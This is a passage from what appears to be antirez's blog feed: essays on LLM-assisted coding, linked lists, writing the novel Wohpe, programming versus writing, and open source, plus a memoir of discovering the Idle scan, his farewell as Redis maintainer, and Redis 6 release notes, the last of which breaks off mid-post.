And then, do LLMs have some reasoning abilities, or is it all a bluff? Perhaps at times, they seem to reason only because, as semioticians would say, the "signifier" gives the impression of a meaning that actually does not exist. Those who have worked enough with LLMs, while accepting their limits, know for sure that it cannot be so: their ability to blend what they have seen before goes well beyond randomly regurgitating words. As much as their training was mostly carried out during pre-training, in predicting the next token, this goal forces the model to create some form of abstract model. This model is weak, patchy, and imperfect, but it must exist if we observe what we observe. If our mathematical certainties are doubtful and the greatest experts are often on opposing positions, believing what one sees with their own eyes seems a wise approach.

Finally, what sense does it make today not to use LLMs for programming? Asking LLMs the right questions is a fundamental skill. The less it is practiced, the less one will be able to improve their work thanks to AI. And then, developing a descriptive ability of problems is also useful when talking to other human beings. LLMs are not the only ones who sometimes don't understand what we want to say. Communicating poorly is a great limitation, and many programmers communicate very poorly despite being very capable in their specific field. And now Google is unusable: using LLMs even just as a compressed form of documentation is a good idea. For my part, I will continue to make extensive use of them. I have never loved learning the details of an obscure communication protocol or the convoluted methods of a library written by someone who wants to show how good they are. It seems like "junk knowledge" to me. LLMs save me from all this more and more every day. Comments]]>
http://antirez.com/news/140
The origins of the Idle Scan http://antirez.com/news/139 http://antirez.com/news/139 Thu, 19 Oct 2023 10:40:27 +0000
Hping was a Swiss Army knife for the TCP/IP protocol. Its initial use was mostly exploratory, for research. With Hping, you could assemble TCP, UDP, and ICMP packets in the most bizarre manner, and encapsulate them in equally eccentric IP packets, fragmented, with fields set to anomalous values. These packets were sent around to observe the network stack response of different operating systems.

This is where Idle scan originates: playing with Hping for just a few minutes revealed a well-known yet (to me) surprising fact. The response packets had an ID field that continuously incremented by some measure. At that time, given that the attacks I would later disclose were not yet known, this ID field behavior aroused no concern. Every time an operating system emitted an IP packet, it first incremented a counter (which reset to zero once it reached the maximum value of two to the sixteenth power minus one), then the packet was sent with the ID set to the counter's value. The counter was universal for all outgoing packets. This allowed, for starters, to estimate the outgoing traffic of any networked computer. This information leak struck me; I saw it as a concerning anomaly. I wrote an initial post on BUGTRAQ, highlighting the issue. Among the responses was one from an Internet luminary, someone who had drafted central RFCs for the TCP/IP protocol. He said that, yes, they were aware; it was a well-known fact. In short: although this characteristic could be used for traffic estimation, most saw no risk. And resolving that issue, deemed negligible, would require a significant overhaul of operating systems. Not worth it.

But I was losing sleep over it, hardly a secondary issue to me. I was convinced that the information provided by the incrementing ID field could be combined with other elements (which I had not fully grasped yet) to mount a far more serious attack. I discussed it with Lorenzo Cavallaro. Lorenzo had introduced me to raw socket techniques months earlier, which I had used to write Hping. He had become my go-to conversational partner, as well as a dear friend; if I had to ponder on TCP/IP-related matters, I would discuss them with him. When I told him about these new ideas, I had to be vague, not by choice but because I hadn't yet pieced together the final attack. Despite my vagueness, he appeared fairly interested.

A couple of days later, I spoke to him again. Finally, I managed to give him a more comprehensive description of the Idle scan (not yet named as such). I had reasoned it out on paper, as there was no way to test it practically. If I remember correctly, Hping was missing some of the necessary functions, although I wouldn't bet on this part: it's been twenty-five years. My memory clears as I write. I believe you couldn't choose the exact flags of the outgoing TCP packet. Anyway, from what I remember, the modifications to Hping took little time, so we were able to test my theory in practice as well. The Idle scan really worked, and proving it in real conditions was very exciting. I don't remember who made this parallel, but essentially, it was like observing the movement of an invisible celestial body indirectly, measuring only its gravitational effects on another, more easily observable body, much like the discovery of Pluto.

All that was left was to make the attack public. Unfortunately, the thought of writing a lengthy email in English terrified me. I was aware that the Idle scan was an interesting idea, and precisely because of that, I was afraid of botching its announcement due to poor presentation. After all, the attack was cumbersome; it could even end up being described so poorly as to make it incomprehensible. Lorenzo and I wrote that email late at night, at my place, certainly drunk. Better than writing it alone; Lorenzo's English, even if slightly, was better than mine. It happened that a colleague from Seclab (also one of the founders), whom I consider a true genius in information security, came from a family of restaurateurs from Emilia. One evening he shows up at my place with a bag. Inside the bag is a fine piece of grey mullet roe, which I had never seen, let alone tasted (it would become one of my favorite foods). The cook-hacker prepares pasta for all of us, and together we eat and drink sufficiently. At the end of the evening, the others leave (there was someone else, besides the cook-hacker), but Lorenzo stays a bit longer.

That evening, Lorenzo and I, fairly tipsy, recklessly thought the time had come to write the Idle scan announcement email (still preserved in the BUGTRAQ archives, and which today appears genuinely delirious [1]). We sit down at my PC to work. The email opens like this: I have uncovered a new tcp port scan method. Instead all others it allows you to scan using spoofed packets, so scanned hosts can't see your real address. Not just the grammar, even the peremptory tone of the email is utterly inappropriate. To top it off, we propose calling the attack dumb host scan, but fortunately, someone quickly finds a better name, which became the official one: Idle scan. Long story short, despite its flawed origins, the Idle scan has become a classic attack, and it's safe to say, as is often the case, that the rest is history.

[1] https://seclists.org/bugtraq/1998/Dec/79 Comments]]>
http://antirez.com/news/139
In defense of linked lists http://antirez.com/news/138 http://antirez.com/news/138 Fri, 04 Nov 2022 18:46:29 +0000
So, get ready to read a sentimental post about a data structure, and don't tell I didn't warn you.

Linked lists are educational. When your teacher, or the page of a book, or anything that exposes you for the first time to linked lists shows you this little circle with an arrow pointing to another circle, something immense happens in your mind. Similar to what happens when you understand recursion for the first time. You get what data structures made of links truly are: the triviality of a single node that becomes a lot more powerful and complex once it references another one. Linked lists show the new programmer fundamental things about space and time in computation: how it is possible to add elements in a constant time, and how order is fundamentally costly, because if you want to insert an element “in place” you have to go from one node to the other. You immediately start thinking of ways to speed up the process (preparing you for the next things), and at the same time you understand, deeply, what O(1) and O(N) really mean.

Linked lists are augmentable. Add a pointer to the previous element, and now it is possible to go both sides. Add “far” pointers from time to time, and you have a skip list with completely different properties. Change every node to hold multiple items and your linked list becomes unrolled, providing very different cache obviousness properties. Linked lists can be embedded, too. The Linux kernel, for instance, has macros to add a field to any structures in order to link them together. There is more: linked lists are composable. This is a bold property: you can split a linked list into two in O(1), and you can glue two linked lists in O(1) as well. If you make judicious use of this property, interesting things are possible. For instance, in Redis modules implementing threaded operations, the thread processing the slow request dealt with a fake client structure (this way there was no locking, no contention). When the threaded command finally ended its execution, the output buffer of the client could be glued together to the actual buffer of the real client. This was easy because the output buffer was represented with a linked list.

Linked lists are useful: Redis can be wrong, but both Redis and the Linux kernel can’t. They are useful because they resemble certain natural processes: adding things in the order they arrive, or in the reverse order, is natural even in the physical world. Pulling items incrementally is useful too, as it is moving such items from head to tail, or moving them a position after the current one.

Linked lists are simple. It is one of those rare data structures, together with binary trees and hash tables and a few more, that you can implement just from memory without likely stepping into big errors.

Linked lists are conceptual. A node pointing to itself is the most self centered thing I can imagine in computing: an ideal representation of the more vulgar infinite loop. A node pointing to NULL is a metaphor of loneliness. A linked list with tail and head connected, a powerful symbol of a closed cycle.

For all those reasons, I love linked lists, and I hope that you will, at least, start smiling at them. Comments]]>
http://antirez.com/news/138
Scrivendo Wohpe http://antirez.com/news/137 http://antirez.com/news/137 Sun, 17 Jul 2022 09:31:34 +0000
Dopo due anni di lavoro, finalmente, Wohpe, il mio primo libro di fantascienza, ma anche il mio primo scritto di prosa di questa lunghezza, è uscito nelle librerie fisiche italiane, su Amazon, e negli altri store digitali. Lo trovate qui: https://www.amazon.it/Wohpe-Salvatore-Sanfilippo/dp/B09XT6J3WX

Dicevo: il primo scritto di questa lunghezza. Ma posso considerarmi del tutto nuovo alla scrittura? Ho scritto per vent’anni in questo blog e in quelli passati che ho tenuto nel corso del tempo, e molto spesso ho usato Facebook per scrivere brevi racconti, frutto di fantasie o basati su fatti reali. Oltre a ciò, ho scritto di cose tecniche, specialmente riguardo la programmazione, per un tempo altrettanto lungo, e sono stato un lettore di racconti e di romanzi per tutto il corso della mia vita. E allora perché scrivere Wohpe è stato anche imparare a scrivere da zero?

Nei primi mesi di scrittura del romanzo, ma anche prima, nei mesi precedenti, quando mi preparavo scrivendo lunghi racconti che poi avrei cestinato, mi è successo ciò che accade spesso a coloro che imparano a giocare a scacchi. Tanti seguono questo percorso: imparano le regole, e va bene, lo sappiamo che con quelle si fa poco; le regole permettono solo di muovere i pezzi in maniera legale. Ma poi, subito dopo, imparano dei rudimenti di tecnica e di strategia, magari studiando duramente per qualche settimana. Però quando sono alla scacchiera, se una mossa non è brutalmente peggiore o migliore di un’altra, tutte le mosse sembrano equivalenti. Il giocatore di scacchi poco abile, poco esperto, non ha un vero gusto per le mosse; non riesce a valutarle non solo per ciò che sono in termini assoluti, ma neanche secondo una sua propria idea. Il risultato è un gioco casuale. Solo più avanti, dopo molte ore di gioco, ella finalmente riuscirà a esprimere delle scelte che, a prescindere dal fatto siano esse giuste o sbagliate, hanno quantomeno una coerenza, sono state davvero pensate: voglio muovere il cavallo qui, per queste precise ragioni, e per tali ragioni preferisco questa mossa a tutte le altre possibili.

Così chi scrive ed è agli inizi, se una frase è buona, con certezza non lo sa (e per continuare col paragone di sopra, così come il gioco dello scacchista sarà casuale, la sua scrittura sarà casuale). Sposta una virgola, cambia una parola. Suona bene o male? Ha delle idee che si è formato scrivendo a scuola e poi scrivendo da adulto, ma queste idee lo assistono poco quando l’ambizione è quella di scrivere una prosa di livello letterario. L’autore alle prime armi non ha un suo stile, perché prima di non saper scrivere non sa ancora leggere: quando legge un libro che adora, raramente capisce esattamente *cosa* accade nella pagina di così convincente, e così anche quando rilegge se stesso, non sa se ha scritto bene o male. Leggi, se vuoi imparare a scrivere! Dicono tutti. Peccato non sia vero: bisogna prima di tutto scrivere per imparare a scrivere, così come bisogna fare dei cortometraggi per imparare a fare il regista, e guardare gli altri film non sarà sufficiente (anche se sarà certamente utile). E per imparare a scrivere, il tipo di lettura che serve davvero è la rilettura di alcuni libri che abbiamo scelti come modelli; quello sì che è utile: la rilettura per comprenderne le forme, fino in fondo. Ora questo semplice fatto, di aver capito quale sia il mio stile, e di saper finalmente leggere e avere un giudizio che emerge immediatamente quando ho tra le mani un’opera, è già un risarcimento più che sufficiente dei due anni di sforzi di scrittura nei quali mi sono profuso.

Ed è una vera fortuna che l’esperienza in sé sia stata di così grande valore, perché quello che molti nuovi autori non sanno è quanto violento possa essere il mercato editoriale mondiale, e quello italiano in particolare. In Italia un libro di fantascienza che ha un buon successo, edito da un piccolo o medio editore, vende 500 copie. Deve andare bene, per avere questi numeri. La gran parte dei libri vende meno di 100 copie. A noi informatici queste cifre fanno rabbrividire. Il più stupido programma che ho scritto ha avuto dieci volte più utenti. Mi spingerei a dire che il più stupido programma che ho scritto e che ho pubblicato con un minimo di energie, ha avuto dieci volte questi *lettori*, gente che ne hanno letto il codice sorgente per capire come funzionasse. Io sono stato, e per questo ringrazio non so bene chi, un programmatore di una certa notorietà, direte voi. Ciò che voglio dire va molto oltre la mia esperienza personale. Anche coloro che non sono conosciuti da nessuno e provano a fare, nella programmazione, una cosa mediamente interessante, appena ben descritta e documentata, e la mostrano un po’ in giro, ricevono un interesse enorme rispetto a quello che spetta agli autori di fiction. I motivi sono tanti e abbastanza ovvi, non vale neppure la pena di soffermarsi su di essi, dunque perché vi racconto queste cose? Per questo motivo:

Sono poche le attività, oltre alla letteratura, dove c’è lo stesso mostruoso scompenso tra le forze necessarie per produrre un’opera e la scarsa risposta del pubblico. Chi decide di dedicare molto tempo alla scrittura, deve conoscere questo fatto da subito. Io per fortuna sapevo già tutto, grazie ai miei amici scrittori; però lo stesso certe sfumature di questa irrilevanza finiscono per essere difficili da accettare.

E allora perché tutti scrivono? Sono straripanti le file di quelli che tentano la fortuna editoriale. Credo sia un meccanismo simile a quello che accade nell’IT, con tanti che provano a creare un nuovo linguaggio di programmazione: il fallimento è quasi certo, ma il tentativo stesso è una delle imprese più soddisfacenti alle quali dedicare le proprie migliori energie.

Ora sono a un bivio: potrei scrivere altra prosa, rimettermi a scrivere codice, o provare a tenere vive le due attività allo stesso tempo. Cosa farò non lo so ancora. Per ora, vediamo cosa succede con Wohpe, sia con la versione italiana che con la traduzione in inglese, a cui in questo momento una capace traduttrice sta lavorando. E su questa cosa delle traduzioni, eseguite col supporto dell’autore, e di quale esperienza significativa sia dal punto di vista filologico, magari vi parlerò qualche altra volta (io e Bridget parliamo l’inglese e l’italiano, ma siamo madrelingua lei di una e io dell’altra lingua, e ciò è molto interessante quando si collabora tra traduttore e autore). Chiudo il post dicendo a chi mi legge: se ne avete voglia, scrivete prosa! Io ora lo so per certo: non è un caso che la scrittura sia stata per centinaia di anni considerata l’arte più alta nella quale cimentarsi. Scrivendo si cercano delle cose, e se si insiste abbastanza si finisce per trovarle davvero. Comments]]>
http://antirez.com/news/137
Writing Wohpe http://antirez.com/news/136 http://antirez.com/news/136 Sun, 17 Jul 2022 09:31:06 +0000
[Sorry for the form of this post. For the first time I wrote a post in two languages: Italian and English. So I went for the unusual path of writing it in Italian to start, translating it with Google Translate, and later I just scanned it to fix the biggest issues. At this point GT is so good you can get away with this process.]

After two years of work, finally, Wohpe, my first science fiction book, but also my first prose writing of this length, has been released in Italian physical bookstores, on Amazon, and in other digital stores. You can find it here: https://www.amazon.it/Wohpe-Salvatore-Sanfilippo/dp/B09XT6J3WX

I was saying: the first writing of this length. But can I consider myself entirely new to writing? I have written for twenty years in this blog and in the past ones that I have kept over time, and very often I have used Facebook to write short stories, the result of fantasies or based on real facts. On top of that, I've been writing about technical stuff, especially programming, for an equally long time, and I've been a short story and novel reader my entire life. So why was writing Wohpe also learning how to write from scratch?

In the first months of writing the novel, but also earlier, in the previous months, when I was preparing myself by writing long stories that I would then throw away, what happened to me often happens to those who learn to play chess. Many follow this path: they learn the rules, and that's okay, we know that you don't do much with them; the rules only allow you to move pieces legally. But then, soon after, they learn some rudiments of tactics and strategy, perhaps studying hard for a few weeks. But when they are on the board, if one move is not brutally worse or better than another, all the moves seem equivalent. The unskilled, inexperienced chess player has no real taste for moves; she fails to evaluate them not only for what they are in absolute terms, but not even according to his own idea. The result is a casual game. Only later, after many hours of play, will she finally be able to express choices that, regardless of whether they are right or wrong, have at least a coherence, they were really thought: I want to move the horse here, for these precise reasons, and for these reasons I prefer this move to all other possible ones.

So whoever writes and is at the beginning, if a sentence is good, he certainly does not know it (and to continue with the above comparison, just as the chess player's game will be casual, his writing will be casual). Move a comma, change a word. Does it sound good or bad? He has ideas that he formed by writing at school and then writing as an adult, but these ideas help him little when the ambition is to write a literary level prose. The novice author does not have his own style, because before not knowing how to write he does not yet know how to read: when he reads a book he adores, he rarely understands exactly * what * happens on the page that is so convincing, and so also when he re-reads himself, he does not know if he wrote well or badly. Read, if you want to learn to write! They all say. Too bad it's not true: first of all you have to write, to learn how to write, just as you have to make short films to learn to be a director, and watching other films will not be enough (although it will certainly be useful). And to learn to write, the kind of reading that is really needed is the rereading of some books that we have chosen as models; what is useful: the rereading to fully understand its forms. Now this simple fact, of having understood what my style is, and of finally knowing how to read and have a judgment that immediately emerges when I have a work in my hands, is already more than enough compensation for the two years of writing efforts in which I have lavished.

And it is fortunate that the experience itself was of such great value, because what many new authors do not know is how violent the world publishing market can be, and the Italian one in particular. In Italy a science fiction book that has a good success, published by a small or medium publisher, sells 500 copies. It has to be fine to have these numbers. Most books sell less than 100 copies. To us computer scientists these figures make us shiver. The stupidest program I wrote had ten times as many users. I would go as far as to say that the stupidest program I've written and published with a minimum of energy has had these * readers * ten times, people who have read its source code to understand how it works. I have been, and for this I thank I don't know who, a programmer of a certain notoriety, you might say. What I mean is far beyond my personal experience. Even those who are not known by anyone and try to do something on average interesting, just well described and documented, in programming, and show it around a bit, receive enormous interest compared to what belongs to the authors of fiction. The reasons are many and quite obvious, it is not even worth dwelling on them, so why am I telling you these things? For this reason:

There are few activities, besides the literature, where there is the same monstrous imbalance between the forces needed to produce a work and the poor response of the public. Anyone who decides to devote a lot of time to writing must know this fact right away. Fortunately, I already knew everything, thanks to my writing friends; however, certain nuances of this irrelevance end up being difficult to accept.

So why is everyone writing? The ranks of those who try their editorial fortune are overflowing. I think it's a similar mechanism to what happens in IT, with many trying to create a new programming language: failure is almost certain, but doing so is one of the most satisfying companies to devote your best energy to.

Now I'm at a crossroads: I could write more prose, get back to coding, or try to keep the two activities alive at the same time. What I'll do I don't know yet. For now, let's see what happens with Wohpe, both with the Italian version and with the English translation, which a capable translator is working on right now. And on this matter of the translations, carried out with the support of the author, and what a significant experience it is from the philological point of view, maybe I will talk to you some other time (Bridget and I speak English and Italian, but we are native speakers of one and I of the other language, and this is very interesting when collaborating between translator and author). I close the post by saying to those who read me: if you feel like it, write prose! I now know for sure: it is no coincidence that for hundreds of years writing has been considered the highest art in which to try one's hand. By writing you look for things, and if you insist enough you end up really finding them. Comments]]>
http://antirez.com/news/136
Programming and Writing http://antirez.com/news/135 http://antirez.com/news/135 Fri, 14 May 2021 09:47:18 +0000
The most obvious parallel between the two activities is that in both of them you write something. Code is not prose written in a natural language, yet it has a set of fixed rules (a grammar), certain forms that most programmers will understand as natural and others that, while formally correct, will sound hard to grasp.
There is, however, a much deeper connection between the two activities: a good program and a good novel are both the sum of local and global elements that work well. Good code must be composed of well written and readable single statements, but overall the different parts of the program must be orthogonal, designed in a coherent way, and have clean interactions. A good novel must also succeed in the same two scales of the micro and the macro. Sentences must be well written, but the overall structure and relationship between the parts is also crucial.

A less structural link between programming and writing is in the drive you need when approaching one or the other: to succeed you need to make progresses, and to make progresses you have to be consistent. There is extensive agreement on the fact that programs and novels don’t write themselves, yet. Twenty years of writing code helped me immensely with this aspect; I knew that things happen only if you sit every day and write: one day one hundred words, the other day two thousands, but rare is the day I don’t put words on the page. And if you have written code that is not just a “filler” for a bigger system, but a creation of your own, you know that writer block also happens in programming. The only difference is that for most people you are an engineer, hence, if you don’t work, you are lazy. The same laziness, in the case of an artist, will assume the shape of a fascinating part of the creative process.

The differences.

I believe the most sharp difference between writing and programming is that, once written, edited and finalized, a novel remains immutable, mostly. There are several cases of writers returning on their novels after several years, publishing a bug fixed version of it, but this is rare and, even when happens, a one-shot process. Code evolves over time, is targeted by an endless stream of changes, often performed by multiple people. This simple fact has profound effects on the two processes: programmers often believe that the first version of a system can be quite imperfect; after all there will be time to make improvements. On the other hand writers know they have a single bullet for every novel, to the point that writing prose is mostly the act of rewriting. Rewriting sentences, whole chapters, dialogues that sound fake, sometimes two, three, or even ten times.

I believe programming, in this regard, can learn something from writing: when writing the first core of a new system, when the original creator is still alone, isolated, able to do anything, she should pretend that this first core is her only bullet. During the genesis of the system she should rewrite this primitive kernel again and again, in order to find the best possible design. My hypothesis is that this initial design will greatly inform what will happen later: growing organically something that has a good initial structure will result in a better system, even after years of distance from the original creation, and even if the original core was just a tiny faction of the future mass the system would eventually assume.

In case you are interested, a quick update about my sci-fi novel. After many self-reviews I sent the manuscript to my editor, Giulio Mozzi. He will send me the change proposals in a few weeks. I’ll start a new review process informed by his notes, and hopefully finalize the novel in one or two months. Then, finally, I’ll be ready to publish the Italian version. A the same time the finalized novel will be sent to my translator, in the US, and when she ends the translation the English version will be published as well. It’s a long journey, but one that I deeply enjoyed taking. Comments]]>
http://antirez.com/news/135
The open source paradox http://antirez.com/news/134 http://antirez.com/news/134 Sat, 03 Oct 2020 09:11:59 +0000
As somebody said, the best code is written when you are supposed to do something else [1]. Like a writer will do her best when writing that novel that, maybe, nobody will pay a single cent for, and not when doing copywriting work for a well known company, programmers are likely to spend more energies in their open source side projects than during office hours, while writing another piece of a project they feel stupid, boring, pointless. And, if the company is big enough, chances are it will be cancelled in six months anyway or retired one year after the big launch.

Open source is different, it’s an artifact, it’s a transposition in code of what you really want to do, of what you feel software should be, or just of all your fun and joy, or even anger you are feeling while coding. And you want it to rock, to be perfect, and you can’t sleep at night if there is a fucking heisenbug. So if a user of your software is addressing you because some part of your code sucks, and is willing to work with you to do something about it, and is very demanding, don’t think they are abusing you because they are not paying you. It’s not about money. You can ignore bugs if you want, and ignore their complains, you can do that since you don’t have a contract to do otherwise, but they are helping you, they care about the same thing you care: your software quality, grandiosity, perfection.

The real right you have, and often don’t exploit, is that you are the only one that can decide about the design of your software. So you are entitled to refuse a pull request, or a proposal to follow good practices, because you feel that what somebody is contributing does not fit in the big picture of what you are designing and building.

But if you recognize that somebody is talking you about something that is, really, a defect in your software, don’t do the error of reducing the interaction to a vile matter of money. You are doing work for free, they are risking their asses deploying what you wrote, you both care about quality.

EDIT: If you write OSS and you are upset about user demands, have you ever thought that maybe, at this point, your work is more similar to office work for some reason?

EDIT 2: A HN user asked the reasons for such title. The paradox is that the OSS writer cares and is often willing to fix code she writes for free, more than the other paid work she does.

[1] "The best programs are the ones written when the programmer is supposed to be working on something else." - Melinda Varian. https://twitter.com/CodeWisdom/status/1309470447667421189 Comments]]>
http://antirez.com/news/134
The end of the Redis adventure http://antirez.com/news/133 http://antirez.com/news/133 Tue, 30 Jun 2020 13:00:16 +0000
But now Redis is, incredibly, one of the main parts of so many things. And year after year my work changed from building this thing to making sure that it was also as useful as possible, as reliable as possible. And in recent years, what I do every day changed so much that most of my attention is spent in checking what other developers tell me about the Redis code, how to improve it, the changes it requires to be more correct or faster or more secure. However I never wanted to be a software maintainer.

I write code in order to express myself, and I consider what I code an artifact, rather than just something useful to get things done. I would say that what I write is useful just as a side effect, but my first goal is to make something that is, in some way, beautiful. In essence, I would rather be remembered as a bad artist than a good programmer. Now I’m asked more and more, by the circumstances created by a project that became so important, to express myself less and to maintain the project more. And this is indeed exactly what Redis needs right now. But this is not what I want to do, and I stretched myself enough during the past years.

So, dear Redis community, today I’m stepping back as the Redis maintainer. My new position will be, on one side, an “ideas” person at Redis Labs, in order to provide inputs for new Redis possibilities: I’ll continue to be part of the Redis Labs advisory board. On the other hand however my hands will be free, and I’ll do something else, that could be writing code or not, who knows, I don’t want to make plans for now. However I’m very skeptical about me not writing more code in the future. It’s just too much fun :D

I leave Redis in the hands of the Redis community. I asked my colleagues Yossi Gottlieb and Oran Agra to continue to maintain the project starting from today: these are the people that helped me the most in recent years, and that tried hard, even when it was not “linear” to follow me in my very subjective point of views, to understand what my vision on Redis was. Since I don’t want to be part of how the new Redis development setup will be shaped (that is the most meta of the maintenance tasks, exactly what I want to avoid), I’ll just leave Yossi and Oran the task of understanding how to interface with the rest of the Redis developers to find a sustainable development model, you can hear directly from Yossi and Oran in this blog post: https://redislabs.com/blog/new-governance-for-redis/

I believe I’m not just leaving Redis in the hands of a community of expert programmers, but also in the hands of people who care about the legacy of the community spirit of Redis. In eleven years I hope I was able to provide a point of view that certain persons understood, about an alternative way to write software. I hope that such point of view will be taken into consideration in the evolution of Redis.

Redis was the most stressful thing I did in my career, and probably also the most important. I don’t like much what the underground programming world became in recent years, but even if it was not an easy journey, I had the privilege to work and interact with many great individuals. Thank you for your humanity and your help, and for what you taught me. You know who you are! I want to also say thank you to the companies and individuals inside such companies that allowed me to write open source every day for so many years, with the freedom to do what I believed to be correct for the user base. Redis Labs, VMware and Pivotal, thank you for your great help and generosity.

As I said, I don’t really know what there is for me in my future, other than the involvement with the Redis advisory board. I guess that for some time, just look around is a good idea, without doing too many things. I would like to explore more a few hobbies of mine. Writing blog posts is also a major thing that I wanted to do but did less and less because of time concerns. Recently I published videos in Italian language explaining technological concepts to the general public, I had fun doing that and received good feedbacks, maybe I’ll do more of that as well. Anyway I guess some of you know that I’m active on Twitter as @antirez. If you are interested in what an old, strange programmer will do next, see you there. Comments]]>
http://antirez.com/news/133
Redis 6.0.0 GA is out! http://antirez.com/news/132 http://antirez.com/news/132 Thu, 30 Apr 2020 13:33:35 +0000
So the big news are the ones announced before, but with some notable changes. The old stuff are: SSL, ACLs, RESP3, Client side caching, Threaded I/O, Diskless replication on replicas, Cluster support in Redis-benchmark and improved redis-cli cluster support, Disque in beta as a module of Redis, and the Redis Cluster Proxy (now at https://github.com/RedisLabs/redis-cluster-proxy).

So what changed between RC1 and today, other than stability?

1. Client side caching was redesigned in certain aspects, especially the caching slot approach was discarded in favor of just using key names. After analyzing the alternatives, with the help of other Redis core team members, in the end this approach looks better. Other than that, finally the feature was completed with the things I had in the backlog for the feature, especially the “broadcasting mode”, that I believe will be one of the most popular usage modes of the feature.

When broadcasting is used, the server no longer try to remember what keys each client requested. Instead clients subscribe to key prefixes: they’ll get notifications every time a key matching the prefix is modified. This means more messages (but only for the selected prefixes), but no memory effort in the server side. Moreover the opt-in / opt-out mode is now supported, so it is possible for clients not using the broadcasting mode, to exactly tell the server about what the client will cache, to reduce the number of invalidation messages. Basically the feature is now much better both when a low-memory mode is needed, and when a very selective (low-bandwidth) mode is needed.

2. This was an old request by many users. Now Redis supports a mode where RDB files used for replication are immediately deleted if no longer useful. In certain environments it is a good idea to never have the data around on disk, but just in memory.

3. ACLs are better in a few regards. First, there is a new ACL LOG command that allows to see all the clients that are violating the ACLs, accessing commands they should not, accessing keys they should not, or with failed authentication attempts. The log is actually in memory, so every external agent can call “ACL LOG” to see what’s going on. This is very useful in order to debug ACL problems.

But my preferred feature is the reimplementation of ACL GENPASS. Now it uses SHA256 based HMAC, and accepts an optional argument to tell the server how many bits of unguessable pseudo random string you want to generate. Redis seeds an internal key at startup from /dev/urandom, and later uses the HMAC in counter mode in order to generate the other random numbers: this way you can abuse the API, and call it every time you want, since it will be very fast. Want to generate an unguessable session ID for your application? Just call ACL GENPASS. And so forth.

4. PSYNC2, the replication protocol, is now improved. Redis will be able to partially resynchronize more often, since now is able to trim the final PINGs in the protocol, to make more likely that replicas and masters can find a common offset.

5. Redis commands with timeouts are now much better: not only BLPOP and other commands that used to accept seconds, now accept decimal numbers, but the actual resolution was improved in order to never be worse than the current “HZ” value, regardless of the number of clients connected.

6. RDB files are now faster to load. You can expect a 20/30% improvement, depending on the file actual composition (larger or smaller values). INFO is also faster now when there are many clients connected, this was a long time problem that now is finally gone.

7. We have a new command, STRALGO, that implements complex string algorithms. For now the only one implemented is LCS (longest common subsequence), an important algorithm used, among the other things, in order to compare the RNA of the coronaviruses (and in general the DNA and RNA of other organisms). What is happening is too big, somewhat a trace inside Redis needed to remain.

Redis 6 is the biggest release of Redis *ever*, so even if it is stable, handle it with care, test it for your workload before putting it in production. We never saw big issues so far, but make sure to be careful. As we collect bug reports, we will prepare to release Redis 6.0.1 ASAP.

A big thank you to the many people that wrote code with me in this release, and to all the companies that sponsored both my work (Thanks Redis Labs), and the the work of the other contributors (Thanks other companies). Also a big thank you to the many that signaled bugs with care, sometimes following the boring process of reiterating after making some changes, or that suggested improvements of any kind.

As usually you can find Redis 6 in different places: at https://redis.io as tarball, and in the Github repository tagged as “6.0.0”.

Enjoy Redis 6,
antirez Comments]]>
http://antirez.com/news/132
Redis 6 RC1 is out today http://antirez.com/news/131 http://antirez.com/news/131 Thu, 19 Dec 2019 16:27:00 +0000
But what’s interesting is that, even additions may be done in very opinionated ways. Redis ACLs hardly resemble something you saw in other systems, and SSL support was written in a few iterations in order to finally pick the idea that was the most sounding, from the point of view of letting the core as clean as possible. I’m quite happy with the result.

Redis 6 does not bring just ACLs and SSL, it is the largest release of Redis ever as far as I can tell, and the one where the biggest amount of people participated. So, let’s start with credits. Who made Redis 6? This is the list of contributors by commits (it’s a terrible metric, but the one I can easily generate), having at least two commits, and excluding merge commits. Also note that the number of commits in my case may be inflated a lot by the fact that I fix many small stuff here and there constantly.

685 antirez
81 zhaozhao.zz
76 Oran Agra
51 artix
28 Madelyn Olson
27 Yossi Gottlieb
15 David Carlier
14 Guy Benoish
14 Guy Korland
13 Itamar Haber
9 Angus Pearson
8 WuYunlong
8 yongman
7 vattezhang
7 Chris Lamb
5 Dvir Volk
5 meir@redislabs.com
5 chendianqiang
5 John Sully
4 dejun.xdj
4 Daniel Dai
4 Johannes Truschnigg
4 swilly22
3 Bruce Merry
3 filipecosta90
3 youjiali1995
2 James Rouzier
2 Andrey Bugaevskiy
2 Brad Solomon
2 Hamid Alaei
2 Michael Chaten
2 Steve Webster
2 Wander Hillen
2 Weiliang Li
2 Yuan Zhou
2 charsyam
2 hujie
2 jem
2 shenlongxing
2 valentino
2 zhudacai 00228490
2 喜欢兰花山丘

Thanks to all the above folks, it was a great team work ladies and gentlemen.
The list of new features in the change log is the following:

* Many new modules APIs.
* Better expire cycle.
* SSL
* ACLs
* RESP3
* Client side caching
* Threaded I/O
* Diskless replication on replicas
* Redis-benchmark cluster support + Redis-cli improvements
* Systemd support rewrite.
* Redis Cluster proxy was released with Redis 6 (but different repository).
* A Disque module was released with Redis 6 (but different repository).

Many big things, as you can see. I’ll spend a few words on selected ones.

RESP3
===

After ten years we needed a new protocol, I talked extensively about it here http://antirez.com/news/125, but then changed my mind, so the RESP3 protocol in Redis 6 is “opt in”. The connection starts in RESP2 mode, and only if you do a handshake using the new HELLO command, you enter in the new protocol mode.

Why a new protocol? Because the old one was not semantical enough. There are other features in RESP3, but the main idea was the ability to return complex data types from Redis directly, without the client having to know in what type to convert the flat arrays returned, or the numbers returned instead of proper boolean values, and so forth.

Since RESP3 is not the only protocol supported I expect the adoption to be slower than expected, but maybe this is not a bad thing after all: we’ll have time to adapt.

ACLs
===

The best introduction to Redis ACLs is the ACL documentation itself (https://redis.io/topics/acl), even if probably it needs some update to match the last minute changes. So it’s more interesting to talk about motivations here. Redis needed ACLs because people need ACLs in bigger environments, in order to control better which client can do certain operations. But another main point about adding ACLs to Redis was isolation in order to defend the data against application bugs. If your worker can only do BRPOPLPUSH, the chance of the new developer adding for debugging a FLUSHALL that ends in production code for error and creates a nightmare for 5 hours, is lower.

ACLs in Redis are for free, both operationally, because if you don’t use them, you can avoid knowing they are supported at all, and from the point of view of performances, since the overhead is not measurable. I guess it’s a good deal to have them. Bonus point, we have a Redis modules interface for ACLs now, so you can write custom authentication methods.

SSL
===

It’s 2019, almost 2020, and there are new regulations. The only problem was doing it right. And doing it right required doing it wrong, understanding the limitations, and then abstracting the Redis connections in order to do it right. This work was entirely performed without my help, which shows how the Redis development process changed in recent times.

Client side caching
===

